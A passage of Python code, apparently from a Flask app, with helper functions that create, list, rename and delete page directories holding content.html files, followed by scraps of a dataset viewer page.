work_directory=work_directory
)
page = {
'content': content,
'sub_pages': sub_pages,
'finding_pages': (page_name, sub_name_pages)
}
return page
return False
def get_pages_info(work_directory: str):
pages = get_pages(work_directory=work_directory)
with_sub_pages = []
for name in pages:
page_directory = os.path.join(work_directory, name)
flag = False
for sub_page_name in os.listdir(page_directory):
if os.path.isdir(os.path.join(page_directory, sub_page_name)):
flag = True
break
if flag:
with_sub_pages.append(name)
return with_sub_pages
def create_page(page_name: str, work_directory: str):
directory_path = os.path.join(work_directory, page_name)
page_path = safe_join(directory_path, 'content.html')
if not os.path.exists(os.path.join(work_directory, page_name)): # Checking for page existence
os.makedirs(directory_path)
with open(page_path, 'a+', encoding='utf-8') as f:
create_text = current_app.config['DEFAULT_TEXT']
f.write(create_text)
return True
return False
def create_sub_page(page_name: str, sub_page_name: str, new_sub_page_name: str, work_directory: str):
directory_params = [work_directory, page_name]
# if sub_page_name:
# directory_params.append(sub_page_name)
if new_sub_page_name:
directory_params.append(new_sub_page_name)
page_directory_path = safe_join(work_directory, page_name)
full_directory_path = safe_join(*directory_params)
full_file_path = safe_join(full_directory_path, 'content.html')
print(full_directory_path, full_file_path)
if os.path.exists(page_directory_path): # Checking for page existence
if os.path.exists(full_directory_path):
return True
os.makedirs(full_directory_path)
with open(full_file_path, 'a+', encoding='utf-8') as file:
create_text = current_app.config['DEFAULT_TEXT']
file.write(create_text)
return True
return False
def rename_page(new_page_name: str, page_name: str, sub_page_name: str, work_directory: str):
directory_params = [work_directory, page_name]
if sub_page_name:
directory_params.append(sub_page_name)
full_directory_path = safe_join(*directory_params)
if os.path.exists(full_directory_path): # Checking for page existence
new_path = os.path.join(os.path.dirname(full_directory_path), new_page_name)
os.rename(full_directory_path, new_path)
return True
return False
def delete_page(page_name: str, sub_page_name: str, work_directory: str):
directory_params = [work_directory, page_name]
if sub_page_name != 'null':
directory_params.append(sub_page_name)
file_params = directory_params + ['content.html']
full_directory_path = safe_join(*directory_params)
full_file_path = safe_join(*file_params)
if os.path.exists(full_file_path): # Checking for page existence
full_directory_remove(path=full_directory_path, work_directory=work_directory)
if sub_page_name != 'null':
return True
return False
|
StarcoderdataPython
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.